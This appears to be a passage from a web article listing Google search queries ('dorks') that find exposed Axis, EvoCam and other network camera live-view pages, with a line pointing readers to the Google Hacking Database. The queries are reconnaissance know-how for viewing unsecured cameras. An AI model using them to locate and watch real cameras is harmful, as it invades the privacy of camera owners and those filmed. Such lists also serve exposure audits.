  •     inurl:ViewerFrame?Mode=Refresh
  •     inurl:axis-cgi/jpg
  •     inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
  •     inurl:view/indexFrame.shtml
  •     inurl:view/index.shtml
  •     inurl:view/view.shtml
  •     liveapplet
  •     intitle:”live view” intitle:axis
  •     intitle:liveapplet
  •     allintitle:”Network Camera NetworkCamera” (disconnected)
  •     intitle:axis intitle:”video server”
  •     intitle:liveapplet inurl:LvAppl
  •     intitle:”EvoCam” inurl:”webcam.html”
  •     intitle:”Live NetSnap Cam-Server feed”
  •     intitle:”Live View / – AXIS”
  •     inurl:indexFrame.shtml Axis
These are the most common search queries used by the hackers. However, there is a big database of such queries available at HackersForCharity called Google Hacking Database. You can find more google dorks in this database.